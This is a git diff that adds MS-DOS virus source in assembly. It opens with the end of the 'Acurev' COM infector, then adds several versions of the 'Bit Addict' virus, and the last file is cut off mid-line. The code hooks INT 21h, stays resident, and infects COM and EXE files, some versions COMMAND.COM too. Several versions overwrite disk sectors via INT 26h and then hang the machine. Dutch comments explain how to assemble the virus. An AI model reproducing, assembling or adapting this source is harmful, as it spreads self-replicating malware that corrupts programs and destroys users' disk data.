cx,finished-encrypted ; total # of bytes to write + lea dx,finished ; and write from here + call do_int21 ; write it man! + + mov ax,5701h ; restore time/date + mov dx,time ; from this value + mov cx,date ; and this value + call do_int21 ; restore it now + + mov ah,3eh ; close the file + call do_int21 ; do it man! + + mov ah,4fh ; find the next file + jmp get ; and jump back to get + +new_dir: + lea dx,dot_dot ; load .. into dx + mov ah,3bh ; change directories routine + call do_int21 ; change the directory + jnc encrypted ; and lets go again baby + +;payload1: + mov ah,2ah ; get the system time + call do_int21 ; get the time now + cmp dh,07 ; is it July? + jne saturday ; is it saturday tho? + cmp dl,16 ; is it the 16th? + jne saturday ; nope, skip payload :( + +;payload: + mov ah,09h ; print a message + lea dx,bdaymsg ; load the message + call do_int21 ; print the message + +saturday: + mov ah,2ah ; get the system time + call do_int21 ; get the time now + cmp al,006h ; is it saturday? + jne end_virus ; naw, end the virus + +;satpload: + mov ah,09h ; print another message + lea dx,satdmsg ; the saturday message + call do_int21 ; print this shit! + +end_virus: + int 20h ; end the virus + +do_int21: + int 21h ; do the int 21h + ret ; return from call + +;data_area: + + satdmsg db '',10,13 + db 'Acurev v1.8 coded by KilJaeden of the Codebreakers on 05/29/98',10,13 + db '',10,13 + db ' --> How Can You Think Freely In The Shadow Of A Church? <--',10,13 + db ' --> You Cannot Sedate, All The Things You Hate <--',10,13 + db '',10,13 + db ' --> Your Infected <--',10,13,'$' + + bdaymsg db '',10,13 + db ' Happy Birthday Christine Moore *kiss* I''ll be home',10,13 + db ' In less then a month now... June29th, Can''t wait!!',10,13,'$' + + time dw 0h ; some space for the time + date dw 0h ; some space for the date + dot_dot db "..",0 ; changeing directories + comfile db "*.com",0 ; load up *.com hehe + db 100 dup (90h) ; make it 666 bytes + finished label near ; just a label man + code ends ; end code segment + end start ; end / where to start + +; ------------------------------------------------------------------------- ; +; ---------> How Can You Think Freely In The Shadow Of A Church? <--------- ; +; ------------------------------------------------------------------------- ; diff --git a/MSDOS/Virus.MSDOS.Unknown.addict1.asm b/MSDOS/Virus.MSDOS.Unknown.addict1.asm new file mode 100644 index 00000000..869f9c30 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.addict1.asm @@ -0,0 +1,191 @@ +code segment + org 0 + + call Virus + +SavedCode db 0cdh,020h,11 dup(090h) + +Jump db 0e9h +NearOfset dw 0 + +ID db 'BIT ADDICT' +ExeHead db 'MZ' + +SaveInt21 equ this word +OldInt21 dd 0 +Teller db 0 +Message db 'The Bit Addict says: ',13,10 + db '"You have a good taste for hard disks, it was delicious !!!"' + db 13,10,'$' + +NewInt21: + cmp ah,4bh + je Exec + jmp cs:OldInt21 +Exec: cmp cs:Teller,100 + jb Infect + + mov ax,2 + xor bx,bx + mov cx,100 + xor dx,dx + int 026h + mov ax,3 + xor bx,bx + mov cx,100 + xor dx,dx + int 026h + + mov ax,cs + mov ds,ax + mov ah,9 + lea dx,Message + int 021h + +HangUp: cli + jmp HangUp + +Infect: push ax + push bx + push cx + push dx + push si + push di + push ds + push es + push dx + mov ax,04300h + int 021h + push cx + mov ax,04301h + xor cx,cx + int 021h + mov ax,03d02h + int 021h + jnc OK1 + jmp Error +Ok1: mov bx,ax + mov ax,05700h + int 021h + push cx + push dx + mov ax,cs + mov ds,ax + mov es,ax + mov ax,03f00h + mov cx,13 + lea dx,SavedCode + int 021h + jc Close + lea si,ID + lea di,SavedCode[3] + mov cx,10 + repe cmpsb + je Close + lea si,ExeHead + lea di,SavedCode + mov cx,2 + repe cmpsb + je Close +Com: mov ax,04202h + xor cx,cx + xor dx,dx + int 021h + jc Close + or dx,dx + jne Close + sub ax,3 + jb Close + mov NearOfset,ax + mov ax,04000h + mov cx,CodeSize + xor dx,dx + int 021h + jc Close + mov ax,04200h + xor cx,cx + xor dx,dx + int 021h + jc Close + mov ax,04000h + mov cx,13 + lea dx,Jump + int 021h + inc cs:Teller +Close: pop dx + pop cx + mov ax,05701h + int 021h + mov ax,03e00h + int 021h +Error: pop cx + pop dx + pop es + pop ds + push ds + push es + mov ax,04301h + int 021h + pop es + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + jmp cs:OldInt21 + +Virus: pop bx + sub bx,3 + xor ax,ax + mov ds,ax + cmp w[021h*4+2],0a000h + jae Exit + mov dx,03bfh + mov al,3 + out dx,al + mov ax,cs + mov ds,ax + mov ax,VirusSegment1 +Repeat: mov es,ax + mov si,bx + xor di,di + mov cx,CodeSize + repe movsb + mov si,bx + xor di,di + mov cx,CodeSize + repe cmpsb + je Ok2 + mov ax,VirusSegment2 + mov dx,es + cmp ax,dx + je Exit + jmp Repeat +Ok2: xor ax,ax + mov ds,ax + mov ax,ds:[84h] + mov es:SaveInt21[0],ax + mov ax,ds:[86h] + mov es:SaveInt21[2],ax + mov ax,NewInt21 + mov [84h],ax + mov ax,es + mov [86h],ax +Exit: mov ax,cs + mov ds,ax + mov es,ax + mov si,bx + add si,3 + mov di,0100h + mov cx,13 + rep movsb + mov ax,0100h + push ax + ret + +CodeSize equ $ +VirusSegment1 equ 0c000h-(($+0fh) shr 4) +VirusSegment2 equ 0bc00h-(($+0fh) shr 4) + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.addict2.asm b/MSDOS/Virus.MSDOS.Unknown.addict2.asm new file mode 100644 index 00000000..2d72df43 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.addict2.asm @@ -0,0 +1,251 @@ +jmpc macro Dest + local Skip + + jnc Skip + jmp Dest +Skip: + endm + +jmpnc macro Dest + local Skip + + jc Skip + jmp Dest +Skip: + endm + +jmpe macro Dest + local Skip + + jnz Skip + jmp Dest +Skip: + endm + +jmpne macro Dest + local Skip + + jz Skip + jmp Dest +Skip: + endm + +code segment + assume cs:code,ds:code,es:code + org 0 + +ID db 'BIT ADDICT' +ID_Length equ $-offset ID + +SavedCode equ this byte +OldIP dw 0 +OldCS dw 0 +OldSP dw 0 +OldSS dw 0 + dw 0 + +Begin: mov ax,4c00h + int 21h + +ComHeader: + mov ax,cs + add ax,0100h +OldPrgSize equ this word-2 + push ax + xor ax,ax + push ax + retf + +Infect: push ax + push bx + push cx + push cx + push si + push di + push bp + push ds + push es + mov ax,3d02h + int 21h + jmpc Close + push cs + pop ds + push cs + pop es + mov bx,ax + mov ah,3fh + mov cx,HeaderLength + lea dx,Header + int 21h + jmpc Close + cmp ax,HeaderLength + jne ComFile + cmp Signature,5a4dh + je ComChk +ExeChk: mov ax,ExeCS + add ax,HeaderSize + mov dx,10h + mul dx + mov cx,dx + mov dx,ax + jmp Check +ComChk: xor cx,cx + mov dx,NearJump + sub dx,offset Begin-3 + jb ComFile +Check: mov ax,4200h + int 21h + mov ah,3fh + mov cx,ID_Length + lea dx,ID_Check + int 21h + lea si,ID_Check + lea di,ID + mov cx,ID_Length + repe cmpsb + jmpe Close + cmp Signature,5a4dh + je ExeFile +ComFile:mov si,offset Header + mov di,offset SavedCode + mov cx,0ah + rep movsb + mov ax,4202h + xor cx,cx + xor dx,dx + int 21h + mov cx,10h + div cx + or dx,dx + je Ok1 + push ax + mov ah,40h + mov cx,10h + sub cx,dx + xor dx,dx + int 21h + pop ax + jc Close + inc ax +Ok1: add ax,10h + mov OldPrgSize,ax + mov ah,40h + mov cx,CodeSize1 + xor dx,dx + int 21h + jmpc Close + mov ax,4200h + xor cx,cx + xor dx,dx + int 21h + jmpc Close + mov ah,40h + mov cx,10 + mov dx,offset ComHeader + int 21h + jmp Close +ExeFile:mov ax,ExeIP + mov OldIP,ax + mov ax,ExeCS + mov OldCS,ax + mov ax,ExeSP + mov OldSP,ax + mov ax,ExeSS + mov OldSS,ax + mov ax,PageCount + dec ax + mov cx,200h + mul cx + add ax,PartPage + adc dx,0 + mov cx,dx + mov dx,ax + mov ax,4200h + int 21h + mov cx,10h + div cx + or dx,dx + je Ok2 + push ax + mov ah,40h + mov cx,10h + sub cx,dx + xor dx,dx + int 21h + pop ax + jc Close + inc ax +Ok2: sub ax,HeaderSize + mov ExeCS,ax + mov ExeIP,offset Begin + add ax,CodeSizePara2 + mov ExeSS,ax + mov ExeSP,200h + mov ax,MinMem + cmp ax,20h+CodeSizePara2-CodeSizePara1 + jae Ok3 + mov ax,20h +Ok3: mov MinMem,ax + mov ax,PartPage + add ax,offset CodeSize2 + xor dx,dx + mov cx,200h + div cx + add PageCount,ax + mov PartPage,dx + mov ah,40h + mov cx,offset CodeSize1 + xor dx,dx + int 21h + jc Close + mov ax,4200h + xor cx,cx + xor dx,dx + int 21h + jc Close + mov ah,40h + mov cx,HeaderLength + mov dx,offset Header + int 21h +Close: mov ah,3eh + int 21h + pop es + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + iret + +CodeSize1 equ $ +CodeSizePara1 equ ($+0fh) / 4 + +Header dw 14h dup(?) +NearJump equ Header[1h] ; Com file + +Signature equ Header[0h] ; Exe file +PartPage equ Header[2h] +PageCount equ Header[4h] +ReloCount equ Header[6h] +HeaderSize equ Header[8h] +MinMem equ Header[0ah] +MaxMem equ Header[0ch] +ExeSS equ Header[0eh] +ExeSP equ Header[10h] +ChkSum equ Header[12h] +ExeIP equ Header[14h] +ExeCS equ Header[16h] +TablOfs equ Header[18h] +OverlayNr equ Header[1ah] +HeaderLength equ 1ch + +ID_Check db ID_Length dup(?) + +CodeSize2 equ $ +CodeSizePara2 equ ($+0fh) shr 4 + +code ends + +end diff --git a/MSDOS/Virus.MSDOS.Unknown.addict3.asm b/MSDOS/Virus.MSDOS.Unknown.addict3.asm new file mode 100644 index 00000000..ea48d3f6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.addict3.asm @@ -0,0 +1,265 @@ +code segment + assume cs:code,ds:code,es:code + + org 0 + +Size2 equ Virus-Relocate + + mov cx,Size2 + mov ax,word ptr ds:[101h] + call Virus + +Relocate: + cmp byte ptr ds:[103h],100 + jb InstallVirus + + xor dx,dx +Repeat: push dx + mov ax,2 + xor bx,bx + mov cx,100 + int 26h + pop ax + pop dx + add dx,100 + jnc Repeat + + cli +Hangup: jmp Hangup + +InstallVirus: + mov ax,04b41h + int 21h + mov ds,ax + pop ax + sub ax,offset Relocate + xor si,si + mov di,ax + mov cx,offset Size1 + cld + repe cmpsb + je Exit + push ax + mov ah,52h + int 21h + push bx + mov ah,30h + int 21h + pop di + pop bx + cmp al,2 + jb Exit + cmp al,3 + adc di,12h + call GetBuffer + mov cs:DataBuffer[bx],ax + call GetBuffer + mov es,ax + push cs + pop ds + mov si,bx + xor di,di + mov cx,offset Size1 + cld + rep movsb + xor ax,ax + mov ds,ax + mov ax,ds:[84h] + mov es:word ptr OldInt21[0],ax + mov ax,ds:[86h] + mov es:word ptr OldInt21[2],ax + mov word ptr ds:[84h],offset NewInt21 + mov word ptr ds:[86h],es + push cs + pop ds + push bx + mov ax,4b40h + lea dx,Command[bx] + int 21h + pop bx +Exit: push cs + pop es + push cs + pop ds + lea si,SavedCode[bx] + mov di,0100h + push di + mov cx,14 + rep movsb + ret + +GetBuffer: + push di + lds si,es:[di] + movsw + movsw + add si,0bh + mov cl,4 + shr si,cl + mov ax,ds + add ax,si + pop di + ret + +Jump db 0e9h +NearOffset dw 0 + db 0 +ID db 'Bit Addict' +Command db '\COMMAND.COM',0 + +SavedCode db 0cdh,020h,12 dup (0h) +Check equ SavedCode[4] +Count equ SavedCode[3] + +OldInt21 dd 0 +DataBuffer dw 0 + +NewInt21: + cmp ax,04b41h + jne Ok1 + mov ax,cs + iret +Ok1: cmp ah,4bh + je Infect +EOI: jmp dword ptr cs:OldInt21 + +WriteHeader: + push dx + mov ax,4200h + xor cx,cx + xor dx,dx + int 21h + pop dx + jc Return + mov ah,40h + mov cx,14 + int 21h +Return: ret + +Infect: push ax + push bx + push cx + push si + push di + push es + push ds + push dx + mov ax,04300h + int 21h + push cx + test cx,1 + jz Ok2 + mov ax,04301h + and cx,0fffeh + int 21h +Ok2: mov ax,03d02h + int 21h + jnc OpenOk + jmp Error +OpenOk: mov bx,ax + mov ax,05700h + int 21h + push cx + push dx + push cs + pop ds + mov es,DataBuffer + xor si,si + xor di,di + mov cx,offset Size1 + cld + rep movsb + push es + pop ds + mov ah,3fh + mov cx,14 + mov dx,offset SavedCode + int 21h + jc Close2 + cmp ax,14 + jne Close2 + mov si,offset Check + mov di,offset ID + mov cx,10 + cld +Comp: lodsb + xor al,SavedCode[1] + scasb + loope Comp + je Counter + cmp word ptr SavedCode,5a4dh + je Close2 + mov ax,04202h + xor cx,cx + xor dx,dx + int 21h + jc Close2 + or dx,dx + jne Close2 + cmp ax,0fe80h + jae Close2 + sub ax,3 + mov NearOffset,ax + push ax + mov si,offset Relocate + mov cx,Size2 +Rep1: xor [si],al + inc si + loop Rep1 + mov ah,40h + mov cx,offset Size1 + xor dx,dx + int 21h + pop ax + jc Close2 + mov si,offset Jump + mov cx,4 +Rep2: xor [si],al + inc si + loop Rep2 + mov dx,offset Jump + call WriteHeader +Close2: jmp short Close +Counter:inc Count + mov dx,offset SavedCode + call WriteHeader + jc Close +Close: pop dx + pop cx + mov ax,05701h + int 21h + mov ax,03e00h + int 21h +Error: pop cx + pop dx + pop ds + test cx,1 + jz Ok3 + mov ax,04301h + int 21h +Ok3: pop es + pop di + pop si + pop cx + pop bx + pop ax + cmp al,40h + je IntRet + jmp EOI + +IntRet: iret + +Virus: pop si + push si + push si +Rep4: xor [si],al + inc si + loop Rep4 + ret + +Size1 equ $ + +code ends + +end + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.addict4.asm b/MSDOS/Virus.MSDOS.Unknown.addict4.asm new file mode 100644 index 00000000..1657a389 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.addict4.asm @@ -0,0 +1,224 @@ +code segment + org 0 + + call Virus + +Displacement equ $ + +SavedCode db 0cdh,020h,11 dup (090h) + +OldInt21 dd 0 +Count db 0 + +Jump db 0e9h +NearOfset dw 0 +ID db 'Bit Addict says: ',13,10 + db '"You have a good taste for hard disks, it was delicious!"' + db '$' + +NewInt21: + cmp ax,0ffffh + jne Ok + cmp dx,ax + jne Ok + mov ax,cs + iret +Ok: cmp ah,4bh + je Exec + jmp EOI + +Exec: cmp cs:Count,100 + jb Infect + + push cs + pop ds + mov ah,9 + lea dx,ID + int 21h + + xor dx,dx + cli +Repeat: push dx + mov ax,2 + xor bx,bx + mov cx,100 + int 26h + pop ax + pop dx + add dx,100 + jmp short Repeat + +Infect: push ax + push bx + push cx + push si + push di + push ds + push es + push dx + mov ax,04300h + int 21h + push cx + mov ax,04301h + xor cx,cx + int 21h + mov ax,03d02h + int 21h + jnc OpenOk + jmp Error +OpenOk: mov bx,ax + mov ax,05700h + int 21h + push cx + push dx + push cs + pop ds + push cs + pop es + mov ah,3fh + mov cx,13 + lea dx,SavedCode + int 21h + jc Close2 + lea si,ID + lea di,SavedCode[3] + mov cx,10 + cld + repe cmpsb + je Counter + cmp word ptr SavedCode,5a4dh + je Close2 + mov ax,04202h + xor cx,cx + xor dx,dx + int 21h + jc Close + or dx,dx + jne Close + sub ax,3 + jb Close + mov NearOfset,ax + mov Count,0 + mov ah,40h + mov cx,CodeSize + xor dx,dx + int 21h + jc Close + mov ax,4200h + xor cx,cx + xor dx,dx + int 21h + jc Close + mov ah,40h + mov cx,13 + lea dx,Jump + int 21h +Close2: jmp short Close +Counter:mov dx,word ptr SavedCode[1] + add dx,offset Count+3 + xor cx,cx + mov ax,4200h + int 21h + jc Close + push ax + push dx + mov ah,3fh + mov cx,1 + lea dx,Count + int 21h + pop cx + pop dx + jc Close + inc Count + mov ax,4200h + int 21h + jc Close + mov ah,40h + mov cx,1 + lea dx,Count + int 21h +Close: pop dx + pop cx + mov ax,05701h + int 21h + mov ax,03e00h + int 21h +Error: pop cx + pop dx + pop es + pop ds + mov ax,04301h + int 21h + pop di + pop si + pop cx + pop bx + pop ax +EOI: jmp cs:OldInt21 + +Virus: mov ax,0ffffh + mov dx,ax + int 21h + pop bx + sub bx,Displacement + mov ds,ax + xor si,si + mov di,bx + mov cx,CodeSize + rep cmpsb + je Exit + push bx + mov ah,52h + int 21h + push es + push bx + mov ah,30h + int 21h + pop si + pop ds + pop bx + cmp al,2 + jb Exit + cmp al,3 + adc si,12h + les di,[si] + push es + push di + les di,es:[di] + mov [si],di + mov [si+2],es + pop ax + pop dx + add ax,0fh + mov cl,4 + shr ax,cl + add ax,dx + mov es,ax + push cs + pop ds + mov si,bx + xor di,di + mov cx,CodeSize + cld + rep movsb + xor ax,ax + mov ds,ax + mov ax,[84h] + mov es:word ptr OldInt21[0],ax + mov ax,[86h] + mov es:word ptr OldInt21[2],ax + mov word ptr [84h],NewInt21 + mov word ptr [86h],es +Exit: push cs + pop es + push cs + pop ds + lea si,SavedCode[bx] + mov di,0100h + push di + mov cx,13 + rep movsb + ret + +CodeSize equ $ + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.addict5.asm b/MSDOS/Virus.MSDOS.Unknown.addict5.asm new file mode 100644 index 00000000..377f7998 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.addict5.asm @@ -0,0 +1,530 @@ +; BIT ADDICT Versie 2.00 +; +; Dit virus besmet exe en com-files, en als het opgestart wordt dan reserveert +; hij 2 diskbuffers en copieert het virus daarheen om resident te blijven. +; Als het virus resident is dan gaat hij in de environment naar de comspec +; zoeken en besment dan de command interpreter (meestal COMMAND.COM). +; Om dit virus te assambleren moet je met TASM, of MASM een OBJ-file maken en +; dan linken naar een exe-file. Wees voorzichtig en veel plezier met dit virus. + +; p.s. wil je dit virus nog aan NIEMAND geven zonder mijn toestemming, omdat +; het virus nog niet helemaal af is, en waarschijnlijk ook niet helemaal zonder +; fouten. + +;----------------------------------------------------------------------------- +;----- ----- +;----- Macros en andere hulpmiddellen ----- +;----- ----- +;----------------------------------------------------------------------------- + +; de macro's hieronder worden gebruikt wanneer een conditionele sprong groter +; wordt dan 128 bytes en er dus een foutmelding komt + +jmpc macro Dest ; vervanging voor jc + local @@00 + + jnc @@00 + jmp Dest +@@00: + endm + +jmpnc macro Dest ; vervanging voor jnc + local @@00 + + jc @@00 + jmp Dest +@@00: + endm + +jmpe macro Dest ; vervanging voor je + local @@00 + + jnz @@00 + jmp Dest +@@00: + endm + +jmpne macro Dest ; vervanging voor jne + local @@00 + + jz @@00 + jmp Dest +@@00: + endm + +eseg segment + mov ax,4c00h ; exit + int 21h +eseg ends + +;----------------------------------------------------------------------------- +;----- ----- +;----- Begin van het Bit Addict virus ----- +;----- ----- +;----------------------------------------------------------------------------- + +cseg segment + assume cs:cseg,ds:cseg,es:cseg + org 0 + +BeginCode equ $ +SavedCode equ this byte ; gegevens over het +OldSignature dw 5a4dh ; programma voor het virus +OldCSIP equ this dword +OldIP dw 0 +OldCS dw 0 +OldSP dw 200h +OldSS dw 0 + dw 3 dup(0) + +Comspec db 'COMSPEC=' ; comspec environment variabele + ; om de command.com te vinden +ID db 'BIT ADDICT 2.00' ; identificatie string +ID_Length equ $-offset ID + +Begin: push ax ; Programma om het virus + push bx ; in het geheugen te zetten + push cx + push dx + push si + push di + push ds + push es + push cs + pop ds + cmp OldSignature,5a4dh + je @@10 + mov si,offset SavedCode ; herstel begin van het + mov di,100h ; com-programma + mov cx,10h + cld + rep movsb + mov OldSS,ss ; bewaar de waarden van + mov OldSP,sp ; ss,sp,cs en ip + sub OldSP,10h + mov OldCS,es + mov OldIP,100h + jmp @@11 +@@10: mov ax,es ; bereken de waarden van + add ax,10h ; ss,sp,cs en ip + add OldCS,ax + add OldSS,ax +@@11: mov ax,4b40h ; controleer of Bit Addict al + int 21h ; in het geheugen aanwezig is + jc @@12 + mov ds,ax + push cs ; vergelijk identificatie + pop ds + mov si,offset ID + mov di,si + mov cx,ID_Length + cld + repe cmpsb + jmpne @@13 +@@12: mov ah,52h ; lees het adres van de eerste + int 21h ; disk-buffer + push bx + mov ah,30h + int 21h + pop di + cmp al,2 ; dit werkt niet op dos 1.x + jmpc @@13 + cmp al,3 ; voor dos 2.x op 13h en voor + adc di,12h ; dos 3+ op 12h + lds si,es:[di] + or si,si + jne @@13 + push di + movsw ; reserveer 1e buffer + movsw + pop di + mov cx,ds + mov dx,ds + call GetBuffer ; reserveer 2e buffer + jc @@13 + call CopyBitAddict ; Copieer bit addict naar + pop es ; de buffers + push es ; Infecteer bestand in de + call InfectComspec ; comspec + jmp @@14 +@@13: call RestoreBuffers +@@14: pop es ; ga nu verder met het + pop ds ; programma voor Bit Addict + pop di + pop si + pop dx + pop cx + pop bx + pop ax + cli + mov ss,cs:OldSS + mov sp,cs:OldSP + sti + jmp cs:OldCSIP + +GetBuffer: ; reserveer een buffer + push di ; cx = eerste buffer + push es ; dx = laatste buffer + jmp @@21 +@@20: push ds + pop es + mov di,si +@@21: lds si,es:[di] + or si,si + jne @@23 + mov ax,ds + sub ax,dx + cmp ax,21h + jne @@22 + mov dx,ds + movsw + movsw + clc + jmp @@24 +@@22: mov ax,ds + sub ax,cx + neg ax + cmp ax,21h + jne @@20 + mov cx,ds + movsw + movsw + clc + jmp @@24 +@@23: stc +@@24: pop es + pop di + ret + +CopyBitAddict: + push cs ; copieer Bit Addict naar de + pop ds ; gereserveerde buffers + mov es,cx + xor si,si + xor di,di + mov cx,CodeSize1 + cld + rep movsb + mov ds,ax ; leid interrupt 21h om naar + mov ax,ds:[84h] ; Bit Addict + mov word ptr es:OldInt21[0],ax + mov ax,ds:[86h] + mov word ptr es:OldInt21[2],ax + mov word ptr ds:[84h],offset NewInt21 + mov word ptr ds:[86h],es + ret + +InfectComspec: + mov es,es:[2ch] ; lees environment segment + xor di,di + push cs ; zoek naar de comspec + pop ds ; variabele + mov si,offset Comspec +@@30: push si + push di + mov cx,8 + cld + repe cmpsb + pop di + pop si + je @@31 + xor al,al + mov cx,-1 + cld + repne scasb + cmp byte ptr es:[di],0 + jne @@30 + jmp @@32 +@@31: push es ; infecteer de COMMAND.COM of + pop ds ; andere command interpreter + lea dx,[di+8] + push cs:OldIP + push cs:OldCS + push cs:OldSP + push cs:OldSS + call Infect + pop cs:OldSS + pop cs:OldSP + pop cs:OldCS + pop cs:OldIP +@@32: ret + +RestoreBuffers: + mov ax,cx +@@40: cmp ax,dx + je @@42 + mov ds,ax + add ax,21h + mov word ptr ds:[0],0 + mov word ptr ds:[2],ax + jmp @@40 +@@42: mov ds,dx + mov ax,es:[di] + mov ds:[0],ax + mov word ptr es:[di],0 + mov ax,es:[di+2] + mov ds:[2],ax + mov es:[di+2],cx + ret + +NewInt21: ; Het nieuwe interrupt 21h + pushf + cmp ax,4b40h + je InstallCheck + cmp ah,4bh + je Exec +EOI: popf + jmp cs:OldInt21 + +InstallCheck: ; Zo kan bit addict weten + mov ax,cs ; dat er al een andere copy + popf ; aanwezig is + clc + retf 2 + +ComHeader: ; dit stukje wordt voor een + mov ax,cs ; COM-file geplaatst + add ax,0100h +OldSize equ this word-2 + push ax + mov ax,offset Begin + push ax + retf + +Exec: call Infect ; functie 4bh, infecteer eerste + jmp EOI ; met Bit Addict + +Infect: push ax ; Infecteer een file + push bx + push cx + push si + push di + push bp + push es + mov ax,4300h ; lees attributen en bewaar + int 21h ; ze + jmpc @@62 + push cx + push dx + push ds + test cx,1 + jz @@51 + mov ax,4301h ; set Read-Only attribuut + and cx,0fffeh ; op nul + int 21h + jmpc @@61 +@@51: mov ax,3d02h ; open de file + int 21h + jmpc @@61 + mov bx,ax + mov ax,5700h ; lees de datum en tijd en + int 21h ; bewaar ze + jmpc @@60 + push cx + push dx + push cs ; ds=es=cs + pop ds + push cs + pop es + mov ah,3fh ; lees de header van de file + mov cx,HeaderLength + lea dx,Header + int 21h + jmpc @@59 + cmp ax,HeaderLength + jne @@54 + cmp Signature,5a4dh + jne @@52 + mov ax,ExeCS ; zoek de plaats waar de + add ax,HeaderSize ; identificatie zou moeten + mov dx,10h ; staan voor exe-files + mul dx + add ax,offset ID + adc dx,0 + jmp @@53 +@@52: mov ax,ComCS ; doe hetzelfde maar dan voor + mov dx,10h ; een com-file + sub ax,dx + mul dx + add ax,offset ID + adc dx,0 +@@53: mov cx,dx + mov dx,ax + mov ax,4200h + int 21h + mov ah,3fh ; lees de ID indien aanwezig + mov cx,ID_Length + lea dx,ID_Check + int 21h + lea si,ID_Check ; controleer of ID aanwezig + lea di,ID ; is + mov cx,ID_Length + cld + repe cmpsb + jmpe @@59 ; als ID aanwezig is, stop dan + cmp Signature,5a4dh + je @@56 +@@54: mov ax,4202h ; infecteer com-files + xor cx,cx ; ga naar het einde van de file + xor dx,dx + int 21h + mov cx,10h ; aanpassen van de com-header + div cx ; aan deze com-file + or dx,dx + je @@55 + push ax + mov ah,40h + mov cx,10h + sub cx,dx + xor dx,dx + int 21h + pop ax + jmpc @@59 + inc ax +@@55: add ax,10h + mov OldSize,ax + mov si,offset Header ; bewaar het eerste deel van + mov di,offset SavedCode ; het programma + mov cx,10h + cld + rep movsb + mov ah,40h ; schrijf het virus achter het + mov cx,CodeSize1 ; programma + xor dx,dx + int 21h + jmpc @@59 + mov ax,4200h ; ga naar het begin van de file + xor cx,cx + xor dx,dx + int 21h + jmpc @@59 + mov ah,40h ; overschrijf het begin van het + mov cx,10h ; programma met de com-header + mov dx,offset ComHeader + int 21h + jmp @@59 +@@56: mov OldSignature,5a4dh ; infecteer exe-files + mov ax,ExeIP ; bewaar de oude waarden van + mov OldIP,ax ; cs:ip en ss:sp + mov ax,ExeCS + mov OldCS,ax + mov ax,ExeSP + mov OldSP,ax + mov ax,ExeSS + mov OldSS,ax + mov ax,PageCount ; pas de waarden van cs:ip en + dec ax ; ss:sp aan, en pas ook de + mov cx,200h ; lengte van de file aan + mul cx + add ax,PartPage + adc dx,0 + mov cx,dx + mov dx,ax + mov ax,4200h + int 21h + mov cx,10h + div cx + or dx,dx + je @@57 + push ax + push dx + mov ah,40h + mov cx,10h + sub cx,dx + xor dx,dx + int 21h + pop dx + pop ax + jc @@59 + inc ax +@@57: sub ax,HeaderSize + mov ExeCS,ax + mov ExeIP,offset Begin + add ax,CodeSizePara2 + mov ExeSS,ax + mov ExeSP,200h + mov ax,MinMem + cmp ax,20h+CodeSizePara2-CodeSizePara1 + jae @@58 + mov ax,20h +@@58: mov MinMem,ax + mov ax,PartPage + add ax,CodeSize1 + add ax,dx + mov cx,200h + xor dx,dx + div cx + add PageCount,ax + mov PartPage,dx + mov ah,40h ; schrijf het virus achter + mov cx,CodeSize1 ; de exe-file, indien de + xor dx,dx ; exe-file overlays bevat dan + int 21h ; worden ze overschreven en is + jc @@59 ; de exe-file onherstelbaar + mov ax,4200h ; beschadigd + xor cx,cx + xor dx,dx ; ga naar het begin van de file + int 21h + jc @@59 + mov ah,40h ; schrijf de nieuwe exe-header + mov cx,HeaderLength ; over de oude heen. + mov dx,offset Header + int 21h +@@59: pop dx ; herstel de datum van de file + pop cx + mov ax,5701h + int 21h +@@60: mov ah,3eh ; sluit de file + int 21h +@@61: pop ds ; herstel de attributen van de + pop dx ; file + pop cx + test cx,1 + jz @@62 + mov ax,4301h + int 21h +@@62: pop es ; herstel de waarden van de + pop bp ; registers en keer terug + pop di ; naar het oude interrupt 21 + pop si + pop cx + pop bx + pop ax + ret + +CodeSize1 equ $-BeginCode +CodeSizePara1 equ ($-BeginCode+0fh) / 10h + +Header dw 14h dup(?) +ComCS equ Header[ComHeader-OldSize] ; Com file + +Signature equ Header[0h] ; Exe file +PartPage equ Header[2h] +PageCount equ Header[4h] +ReloCount equ Header[6h] +HeaderSize equ Header[8h] +MinMem equ Header[0ah] +MaxMem equ Header[0ch] +ExeSS equ Header[0eh] +ExeSP equ Header[10h] +ChkSum equ Header[12h] +ExeIP equ Header[14h] +ExeCS equ Header[16h] +TablOfs equ Header[18h] +OverlayNr equ Header[1ah] +HeaderLength equ 1ch + +ID_Check db ID_Length dup(?) + +OldInt21 dd ? + +CodeSize2 equ $-BeginCode +CodeSizePara2 equ ($-BeginCode+0fh) / 10h + +cseg ends + +sseg segment stack + db 200h dup(?) +sseg ends + +end Begin \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.addict6.asm b/MSDOS/Virus.MSDOS.Unknown.addict6.asm new file mode 100644 index 00000000..0535d7eb --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.addict6.asm @@ -0,0 +1,612 @@ +; BIT ADDICT Versie 2.10 + +;----------------------------------------------------------------------------- +;----- ----- +;----- Macros en andere hulpmiddellen ----- +;----- ----- +;----------------------------------------------------------------------------- + +; de macro's hieronder worden gebruikt wanneer een conditionele sprong groter +; wordt dan 128 bytes en er dus een foutmelding komt + +jmpc macro Dest ; vervanging voor jc + local @@00 + + jnc @@00 + jmp Dest +@@00: + endm + +jmpnc macro Dest ; vervanging voor jnc + local @@00 + + jc @@00 + jmp Dest +@@00: + endm + +jmpe macro Dest ; vervanging voor je + local @@00 + + jnz @@00 + jmp Dest +@@00: + endm + +jmpne macro Dest ; vervanging voor jne + local @@00 + + jz @@00 + jmp Dest +@@00: + endm + +eseg segment + mov ax,4c00h ; exit + int 21h +eseg ends + +;----------------------------------------------------------------------------- +;----- ----- +;----- Begin van het Bit Addict virus ----- +;----- ----- +;----------------------------------------------------------------------------- + +cseg segment + assume cs:cseg,ds:cseg,es:cseg + org 0 + +BeginCode equ $ +SavedCode equ this byte ; gegevens over het +OldSignature dw 5a4dh ; programma voor het virus +OldCSIP equ this dword +OldIP dw 0 +OldCS dw 0 +OldSP dw 200h +OldSS dw 0 + dw 3 dup(0) + +Comspec db 'COMSPEC=' ; comspec environment variabele + ; om de command.com te vinden +ID db 'BIT ADDICT 2.10' ; identificatie string +ID_Length equ $-offset ID + +Begin: push ax ; Programma om het virus + push bx ; in het 